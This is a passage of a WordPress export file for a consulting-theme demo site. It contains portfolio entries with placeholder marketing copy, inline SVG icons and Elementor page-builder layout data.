			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>June 25, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>802</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:38:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:38:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-planning]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[803]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"397902fd","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"26a3c89f","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"5d3639ae","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"4764c788","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"c953f5b","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"6976af58","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"532be286","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1f8d8f2","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f6bdc05","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"456060bf","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1b23ea4e","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3795aac6","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7c34ff65","elType":"widget","settings":{"editor":"<p>June 25, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"426b0206","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"44248ebd","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"3832640c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"b6a26ad","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"481b7621","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"619e6bb","elType":"section","settings":[],"elements":[{"id":"9b6e15a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"44c9697","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8dfe4aa","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"173625b","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"64a583f","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2f70c8b","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4a84e80","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7218ca2","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"3486a61","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2d5b46d","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"c08d5fb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"137311f","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7f4da55","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"ab14238","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"47cc7f2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"8984e2c","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"12fe87b","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"6c67bfe","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"22f8dab","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"9f3017a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"2db5af2","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"47908fe","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"2bec648","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"9a7d99e","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Money Market</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/money-market/</link>
		<pubDate>Fri, 11 Sep 2020 04:41:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=806</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>April 12, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
